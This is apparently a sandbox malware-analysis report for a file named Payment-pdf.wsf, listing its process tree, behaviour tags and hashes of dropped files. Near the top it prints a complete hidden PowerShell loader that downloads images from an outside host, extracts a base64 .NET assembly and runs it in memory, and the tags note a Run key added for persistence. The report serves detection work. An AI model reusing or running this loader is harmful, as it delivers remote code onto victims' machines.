                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:820
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ram/ed/di.snz//:sptth' , '1' , 'C:\Windows\Temp\' , 'NameWsf','RegAsm',''))} }"
                                      3⤵
                                      • Blocklisted process makes network request
                                      • Adds Run key to start application
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4872
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\NameWsf.vbs
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2420
                                • C:\Windows\System32\Notepad.exe
                                  "C:\Windows\System32\Notepad.exe" E:\Payment-pdf.wsf
                                  1⤵
                                  • Enumerates connected drives
                                  PID:5332
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                  1⤵
                                    PID:5560
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                      2⤵
                                      • Checks processor information in registry
                                      • Modifies registry class
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5632
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5632.0.1241768546\1132330496" -parentBuildID 20221007134813 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {39dbde11-cfc8-478c-88dc-5f142a641205} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" 2008 26eacadc858 gpu
                                        3⤵
                                          PID:5812
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5632.1.358289816\1954033802" -parentBuildID 20221007134813 -prefsHandle 2396 -prefMapHandle 2392 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc642bd8-1f92-4e87-a36b-6f69c6991c2d} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" 2408 26e98fe3e58 socket
                                          3⤵
                                            PID:5880
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5632.2.5117880\775828466" -childID 1 -isForBrowser -prefsHandle 3320 -prefMapHandle 3316 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1236 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6c324bd-4790-495f-8ad4-c888f0485ed5} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" 3332 26eb0ccce58 tab
                                            3⤵
                                              PID:4380
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5632.3.853948317\1964984637" -childID 2 -isForBrowser -prefsHandle 3600 -prefMapHandle 3596 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1236 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce893c1b-f140-44fd-a0cb-53b5804e19c8} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" 3608 26e98f62558 tab
                                              3⤵
                                                PID:4848
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5632.4.1505367448\1178723685" -childID 3 -isForBrowser -prefsHandle 4004 -prefMapHandle 4352 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1236 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c198830d-f90d-405b-b30d-ee7d26c852e2} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" 4324 26eb1ddb758 tab
                                                3⤵
                                                  PID:3720
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5632.5.830614817\489881035" -childID 4 -isForBrowser -prefsHandle 5152 -prefMapHandle 5148 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1236 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {35b89c33-faf3-45ab-a85b-febf0afe765f} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" 5164 26eb2dd3858 tab
                                                  3⤵
                                                    PID:3460
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5632.6.1982814103\1295505304" -childID 5 -isForBrowser -prefsHandle 5308 -prefMapHandle 5312 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1236 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3899577a-fe3f-49f1-beac-81ed1f75506e} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" 5300 26eb2fa4b58 tab
                                                    3⤵
                                                      PID:3384
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5632.7.921506049\618036497" -childID 6 -isForBrowser -prefsHandle 5500 -prefMapHandle 5504 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1236 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba47a14b-25a8-4358-a92f-ff5c6e472cc7} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" 5492 26eb2fa3058 tab
                                                      3⤵
                                                        PID:2252
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5632.8.402065205\1082003592" -childID 7 -isForBrowser -prefsHandle 6024 -prefMapHandle 6020 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1236 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c308a877-d515-44e3-8419-bb41e0d08963} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" 6032 26eb4abe658 tab
                                                        3⤵
                                                          PID:4080
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5632.9.865988236\996459813" -childID 8 -isForBrowser -prefsHandle 4116 -prefMapHandle 4644 -prefsLen 26646 -prefMapSize 233444 -jsInitHandle 1236 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {476023b0-3f1e-4170-8aea-a7a7b0d5a4c7} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" 5968 26eb33d7b58 tab
                                                          3⤵
                                                            PID:3168
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5632.10.615709424\1560157633" -childID 9 -isForBrowser -prefsHandle 4940 -prefMapHandle 5908 -prefsLen 26646 -prefMapSize 233444 -jsInitHandle 1236 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {770b66dc-e62f-4eec-a3a9-2ce90efed95c} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" 2876 26eb542be58 tab
                                                            3⤵
                                                              PID:4960
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5632.11.1349798532\1741354030" -childID 10 -isForBrowser -prefsHandle 7576 -prefMapHandle 7572 -prefsLen 26646 -prefMapSize 233444 -jsInitHandle 1236 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {517b1690-0dfc-4f0c-bf23-873dbf55d0b6} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" 7072 26eb54c1458 tab
                                                              3⤵
                                                                PID:3720

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                            Filesize

                                                            2KB

                                                            MD5

                                                            6cf293cb4d80be23433eecf74ddb5503

                                                            SHA1

                                                            24fe4752df102c2ef492954d6b046cb5512ad408

                                                            SHA256

                                                            b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                            SHA512

                                                            0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                            Filesize

                                                            152B

                                                            MD5

                                                            f35bb0615bb9816f562b83304e456294

                                                            SHA1

                                                            1049e2bd3e1bbb4cea572467d7c4a96648659cb4

                                                            SHA256

                                                            05e80abd624454e5b860a08f40ddf33d672c3fed319aac180b7de5754bc07b71

                                                            SHA512

                                                            db9100f3e324e74a9c58c7d9f50c25eaa4c6c4553c93bab9b80c6f7bef777db04111ebcd679f94015203b240fe9f4f371cae0d4290ec891a4173c746ff4b11c1

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                            Filesize

                                                            152B

                                                            MD5

                                                            1eb86108cb8f5a956fdf48efbd5d06fe

                                                            SHA1

                                                            7b2b299f753798e4891df2d9cbf30f94b39ef924

                                                            SHA256

                                                            1b53367e0041d54af89e7dd59733231f5da1393c551ed2b943c89166c0baca40

                                                            SHA512

                                                            e2a661437688a4a01a6eb3b2bd7979ecf96b806f5a487d39354a7f0d44cb693a3b1c2cf6b1247b04e4106cc816105e982569572042bdddb3cd5bec23b4fce29d

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                            Filesize

                                                            184B

                                                            MD5

                                                            4d4434587e940fcc5eba7d6450c55acd

                                                            SHA1

                                                            ad92c2d9f1a0fba07ce2f175e9757b33b14a4579

                                                            SHA256

                                                            30b0ac0cba231f5d11c1fc39efde81131e753b3a624ecf5e3e12ce65e8f88e1b

                                                            SHA512

                                                            68bdfd77b3b4dfb0691e17be2d68cbbe3b4b7c83db01e0b18da9a6e4fa99b8fd6c2fa89d5c0f1d313acb56469b4fe5a44af45402212829f71f20bea2cfbbb8bb

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            a96dba0c2592601de2e22d5168473023

                                                            SHA1

                                                            a466925f1c77081fdf1dc97ec3c1a2aa8720b430

                                                            SHA256

                                                            5d2363c0691c02aaa2aa2ffda203e27f46e6cd5d602391c5a351ab939f1659c9

                                                            SHA512

                                                            5a7fdce8c8cf11560c0d241e1de9b1d33941617aa0f263a2bc49c51d6cc8b485ac8f8f9367e2ea2e98f77cbfe4572c41ceb5d0029ffbfa0828cf98feaccfdd1e

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            ba7e06ad941f156bdb9361c1db46f8c2

                                                            SHA1

                                                            0dcc1a1c0d4b97b8381eb1dfdcd79ba6deac5981

                                                            SHA256

                                                            3324240a529c01bd3c43aa685dcf2e42295993eca92b0c6d71a244d8d10919b1

                                                            SHA512

                                                            792015daea21f98213320d22452be76adb5d8ad1403a2d738069834f5f24d3f424271ac0d3be9084bdeb6a1dbf485526744e781056f042887bb7eaf998d83372

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                            Filesize

                                                            16B

                                                            MD5

                                                            6752a1d65b201c13b62ea44016eb221f

                                                            SHA1

                                                            58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                            SHA256

                                                            0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                            SHA512

                                                            9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                            Filesize

                                                            11KB

                                                            MD5

                                                            c3890db0610b3db885fa7cd2413868f9

                                                            SHA1

                                                            2061c2fcbe78193ead763731b209d4db18f6c700

                                                            SHA256

                                                            e6c54aadd1737128be0543a1b1b980149b17a4c3785ad61a576fe2403c7a49c9

                                                            SHA512

                                                            2ff72a673a6202e047a3a3b0106c2f5b7b6c7a77c0f5f80865031ae26ab2065907fa014a44b5a6a478e57c906a989a675f1aed433a3f7b4e6ecfd51e95fadc57

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                            Filesize

                                                            11KB

                                                            MD5

                                                            245e75b29ce4576d78b26ed3275a2983

                                                            SHA1

                                                            6ad266c53d07426e7a592c4d7686e74a793cee61

                                                            SHA256

                                                            92f5cc64ec1d18d29da288a60e16e1f5e4a5aeab9b3e195c612b49778186872d

                                                            SHA512

                                                            1dbbe95c24eea1381196bb55c0d9157ffe9e42484a223759663de6b30811b74d60f30f10568ed87e8739cca763b50cc1a9670df019b5f665541cedcef37fe04f

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GP57WU1M\xiLkcFps[1].txt

                                                            Filesize

                                                            12KB

                                                            MD5

                                                            227796cc30dd798257fa3049eaf15cfd

                                                            SHA1

                                                            383504864e9c54edd750674a34affbb76323acb6

                                                            SHA256

                                                            d6b90571032e941f95784d205784897398695c29e9cdd57793f2aaf017fd13d6

                                                            SHA512

                                                            354fcf6042d0ba63de4d983a67083eca139672dd64ef8fa0b42429ed43e24663ae9eadb367fd2f775c727072f640a1a5a64bcce5239d0568f5d802cf976de693

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            64B

                                                            MD5

                                                            50a8221b93fbd2628ac460dd408a9fc1

                                                            SHA1

                                                            7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

                                                            SHA256

                                                            46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

                                                            SHA512

                                                            27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            64B

                                                            MD5

                                                            446dd1cf97eaba21cf14d03aebc79f27

                                                            SHA1

                                                            36e4cc7367e0c7b40f4a8ace272941ea46373799

                                                            SHA256

                                                            a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                                            SHA512

                                                            a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            418f435bd8cf7249807a00188bca7f8d

                                                            SHA1

                                                            5e922dba218f1c62a644a89d4b8ca62b2d0dc60a

                                                            SHA256

                                                            7e8b52e922f6e5a01aa3b3ca7ebb1b0d2468b93fe02e6e99d00b473891b8a549

                                                            SHA512

                                                            309fed88cea3e5676597c228bfc674a72ed32b6f76007083647492d3b5d6a34fb28d3e8158b7faff5f4f8584c49fb803ccdfbfcb5b2bb345b7a7c38b00d61ef8

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            64B

                                                            MD5

                                                            d8b9a260789a22d72263ef3bb119108c

                                                            SHA1

                                                            376a9bd48726f422679f2cd65003442c0b6f6dd5

                                                            SHA256

                                                            d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

                                                            SHA512

                                                            550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            9057d0eebad26bc8e1de57434310a514

                                                            SHA1

                                                            b8387b4d9c153c1a11526ad7a468d5bfa35d6209

                                                            SHA256

                                                            c336386ab7bd0e431aa017627e10516c9b917462052cd63f815c609baf48097c

                                                            SHA512

                                                            47c88c10c362d58814d90a60c50259101458040d2dfcf5990423ddeac4ef89e110faa2ce696b1de276e793dea96d6a878fa879c156833435a4982ca8224e321f

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            57015ac34ad908a745a56b832075fcdd

                                                            SHA1

                                                            155f89127eb971bc1fa4f08905b39a970d7b553e

                                                            SHA256

                                                            d9c4afed9bad20e418735d27a8ef2c3fde3a365f007841b8a5d8c6a56c58a9c7

                                                            SHA512

                                                            4ec60403c004c1aea56fd31082b8f061075f07d56d155519725d9a9f73198a3e4d17190e634006e25ea7c705ae7625e392f41b6c5087b56a1e1277933b0e0e43

                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\on1px6pk.default-release\cache2\doomed\15448

                                                            Filesize

                                                            9KB

                                                            MD5

                                                            8de1687bf1a07cff498016cde65113d1

                                                            SHA1

                                                            b03177345610c213171624ad26a34af48dd20d5c

                                                            SHA256

                                                            6be220b2a7d40232c3bfa80d2e2783a4c75b68d6d150aea56e78bfa144404484

                                                            SHA512

                                                            6f5af23a2648a18682410d66489d3c031c8c6a9e2fe5c5af9403d63050953b52513b8a77a5a1c820ddf528bfe3979cedf613b653472253a275d85f3b4a6d5053

                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\on1px6pk.default-release\cache2\doomed\2026

                                                            Filesize

                                                            43KB

                                                            MD5

                                                            804fc0707f37e225bc31fd695f15342e

                                                            SHA1

                                                            9a1939e86c6c71c1a272eac8e82b3701e544b714

                                                            SHA256

                                                            48b9de8dbf2aa4ca55616e8dda075ae70066555a27799653776476d2e3034868

                                                            SHA512

                                                            ec5d88eda339e563bdda284b00bd8ef7837532ffb30ce6265e81096d4e57fc7c3195c11922aef14b7578c5d0cf98b797d9ac77082c3f2bd515f80b51776a71f6

                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\on1px6pk.default-release\cache2\doomed\25491

                                                            Filesize

                                                            9KB

                                                            MD5

                                                            9d70da0a8eef75b8d4840f333bd0196f

                                                            SHA1

                                                            de6a577e6b2826a62fe90547425d8fe8f8d6bad3

                                                            SHA256

                                                            43dd41ea04a1356056fb3fe60692ce5c7f12b381dba25079f2d261b7264dc165

                                                            SHA512

                                                            3e09e69b40da9c3ee7f1b70dc280bb966479b50fbd9e4355c2509f2ba8d98e2b79884c84d0a1986ca88752b3135944eafb8489c68de275c957153bae849a0cc3

                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\on1px6pk.default-release\cache2\doomed\31055

                                                            Filesize

                                                            12KB

                                                            MD5

                                                            3a357db260e5484f4f81506b7c63c111

                                                            SHA1

                                                            1dcd5ea9c83e9e16de1cd6cfdccfe78ec84721ae

                                                            SHA256

                                                            7eb8720ff13695632f1efcdff4fc551051810e111dbcd5f029334b8680ed3cab

                                                            SHA512

                                                            112b2661b36335846b972fb4cabea82f8633e432bc3154a0c403fcb0f28bb9378c7410db02d625e1ffe96afaab266f42a569ccceff129101d574bd84677dbe44

                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\on1px6pk.default-release\cache2\doomed\31428

                                                            Filesize

                                                            13KB

                                                            MD5

                                                            bc5cf4a6fa44b837cdc3514a9c1cc9f6

                                                            SHA1

                                                            8983f678bf20a70cf70535d17bbcea016821d4a1

                                                            SHA256

                                                            e78a254982e66417c7998779bd6b3f4cf94b7cce2fedf7c436f0eff66485e85e

                                                            SHA512

                                                            7d246065b074c3b4ff329a96af627770e60357ec87c904ed1dfe5fe683e39f94263e3589f17709df88d58b1893fa099e8c34583f4f2f931f821d7e45d976aa1e

                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\on1px6pk.default-release\cache2\doomed\6395

                                                            Filesize

                                                            10KB

                                                            MD5

                                                            8937a273f56528217cd36fd3c95a250b

                                                            SHA1

                                                            0037264cbc7be1b07fa8ae3af827c24f9602a064

                                                            SHA256

                                                            992028921091deb2e93bd9332f04a2af56e3c7208e9a2cd08c0973c723042053

                                                            SHA512

                                                            b018aaaf15bfd7230004887686d34f1bbe4d5c86c36d4b3a42b906b6de5ee92bb0054ff3e1398b025c2f1eeaeb6e3dc25e7ff9c576812d5fadef7a4066f53e40

                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\on1px6pk.default-release\cache2\entries\4EA42D4B27502BA7C55CC1ED92713898ACFF6F68

                                                            Filesize

                                                            207KB

                                                            MD5

                                                            f55fb488b5122e664b7b4c93accaff5a

                                                            SHA1

                                                            cafeadecf296c1ea0fa38715095f21b49eecd391

                                                            SHA256

                                                            bb0113cc6639a6b181e448312103451b7f14d45ee0d2ff8f5c4c8070a796749b

                                                            SHA512

                                                            e08a01efedea0edaec347cc8da7c4b6af2b56fd55ba4f0e55742200129c9c1865e828aeb42c48f55b500bd5098b01971f52c08260434e411131b2cfb139f70dd

                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\on1px6pk.default-release\cache2\entries\92B998078D5CD330F9BE1AB871D62D4ECDA121CB

                                                            Filesize

                                                            60KB

                                                            MD5

                                                            013bfca4d8ed79be83ce8a631a2a48af

                                                            SHA1

                                                            0840fa7c0208df5fc7f20fe2cc7c9015b903c06e

                                                            SHA256

                                                            d38cf7beb4d0b72f9a495a8876f159886fe4554697433cb4846cec40fd2af41b

                                                            SHA512

                                                            e8ddf8d093df18b76123cead92217b99a2d78764029a5d5523bb96eb1129cedec3b58dd92599b271c5c3df3ea1a764107c9bbcccbdeaf1ad415e3d47d2dfd8fe

                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqkj1r0k.vxn.ps1

                                                            Filesize

                                                            60B

                                                            MD5

                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                            SHA1

                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                            SHA256

                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                            SHA512

                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\datareporting\glean\db\data.safe.bin

                                                            Filesize

                                                            2KB

                                                            MD5

                                                            5d0de57b4966240f9892fc2e5a91145f

                                                            SHA1

                                                            2c42b8871ee8936246d631b78a988712d97856f9

                                                            SHA256

                                                            9b7f17791948e3f7577fc811052c62dba302009dfb4b30a1054016728954b516

                                                            SHA512

                                                            d3e3e0ea485075fb048616abfc88402e1fa836e88b6f3455d39ae80c546bb3b66fdee6b1aa636d3fd179a8ca7430eaf49a64a11f91f4fc383f806560840dfcef

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\datareporting\glean\pending_pings\0da9d410-b564-4a84-9c09-73632280ba2a

                                                            Filesize

                                                            10KB

                                                            MD5

                                                            fe414126757f9b0901ee77a99cfeaa04

                                                            SHA1

                                                            4241f4fe00f8797cdb5dc8ca59874d124bbeccb9

                                                            SHA256

                                                            18119a657bbadd22adf17374f4709e82657a4e3076f0caafa092dbafadad6231

                                                            SHA512

                                                            e68f1a36d86df523aa39b0ecfda7a0c79a24d3e636cc84dd50eec9b4e0f6a91b27626419ae22e45a3d880f1f632fbf795de0e0f589f3f7d22172ada0b60a18c8

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\datareporting\glean\pending_pings\570bcb8c-379d-4066-952e-3db6b4cbc2d0

                                                            Filesize

                                                            746B

                                                            MD5

                                                            6999ee6d70aa462f91d0462238e38301

                                                            SHA1

                                                            c9f96b823206bf34d0cedadd9cf805f191794eba

                                                            SHA256

                                                            ca7a0180e6295413fd9c7200178a1c0da6d2299f48a0d86136c6d66e07199c2a

                                                            SHA512

                                                            372151b9da21887334fc127c5400d445a60de8062a3ad1852e8f34b30782e585cb0e43c59ce31eac09c25f75a8d94bb07d43359ed68b336cc89e46950e3e2940

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\prefs-1.js

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            e9857de7fc53ed7c804c346e9ccc2fa1

                                                            SHA1

                                                            c32e2da6b9724ce451b0b4c94a5fd5c1a4857d00

                                                            SHA256

                                                            993b24b2ce65530cd2eb27c911fe1b1f7342d56de7fc9d5d4aa9e0b197c47d3f

                                                            SHA512

                                                            ddec2c8b76790f9733cc82d56c6207701decea18ecc55676c8f5b8f00e31d5fc2c26b01f3aca4c5cfd3f3158dbc19b4de2077175edb84896f3c1a5937cab10c3

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\prefs-1.js

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            de48cecfe9a39734682f06a67d4c2768

                                                            SHA1

                                                            3cae3858e0d02fd773ac56bb36881c1aa3195b49

                                                            SHA256

                                                            5777aecd7d09da10887d02c2ffa0df64e9402c8ba15d2fd8b6a95a681ac9a800

                                                            SHA512

                                                            c648c8e1967504334a815084c5463b4b23010363212846c6b982512d759858059962a611b1a1d70bc1193f149dc21ee5e67fe66117f7d425970a6d72e9767c27

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\prefs.js

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            936e8064e2c337e78f88341e551f574b

                                                            SHA1

                                                            400bcecdc0ee47190ecc59ffed54b01f00da1e8f

                                                            SHA256

                                                            461e40eb4f4c8dab43781ee930f17fb2bd32de6070268ff83184617fee4c5836

                                                            SHA512

                                                            298c454dc8aaa09b947939d3f7411acd4acaaf07b429717ed13fe89f219273f74b95dd0d0d0dd37bea779ffc4d6cdfb56ec78c9566c25e55fea3ccb9b75f3e9a

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\serviceworker-1.txt

                                                            Filesize

                                                            190B

                                                            MD5

                                                            78d184820178dd230db0b2705c9b136b

                                                            SHA1

                                                            90daeccf25dbc92d40d89e1ff43ece7b6aa7b543

                                                            SHA256

                                                            1adf3a8edbc8c8db8901eff92013ecdb03fcd5760f0cb6386549884b59493a2c

                                                            SHA512

                                                            4d6c1b9128e10566da32bc9fa2266d72d7904675c66ad1e4e391e33ed2559f1ab00ee34d12151574d2adfe3feb69845eb1813b72d526e3d1a7889ab21f94f9d8

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\serviceworker.txt

                                                            Filesize

                                                            190B

                                                            MD5

                                                            735a99ca3bd5d207b31a410e58ab2ee7

                                                            SHA1

